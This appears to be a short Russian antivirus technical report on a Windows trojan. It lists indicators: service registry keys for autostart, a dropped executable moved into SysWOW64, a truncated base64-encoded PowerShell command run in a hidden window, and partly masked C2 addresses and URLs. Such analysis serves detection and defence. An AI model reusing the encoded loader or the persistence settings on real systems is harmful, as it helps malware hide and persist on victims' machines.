Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\svcspixel] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\svcspixel] 'ImagePath' = '"%WINDIR%\SysWOW64\svcspixel.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADIAMwBjAGMANQAzAGMANQAzAGIAPQAnAHgAMQA3ADgANABiADIAMAB4ADUAOAAnADsAJAB4ADkAMwAzADAAMgAxADcAMAA...
- %HOMEPATH%\445.exe
- %HOMEPATH%\445.exe в %WINDIR%\syswow64\svcspixel.exe
- '20#.#84.105.242':443
- http://sa###rithuc.com/wordpress/38f4u_zfdx63-0930031795/
- http://20#.##4.105.242:443/tlb/site/
- DNS ASK sa###rithuc.com
- '%HOMEPATH%\445.exe'
- '%WINDIR%\syswow64\svcspixel.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADIAMwBjAGMANQAzAGMANQAzAGIAPQAnAHgAMQA3ADgANABiADIAMAB4ADUAOAAnADsAJAB4ADkAMwAzADAAMgAxADcAMAA...' (со скрытым окном)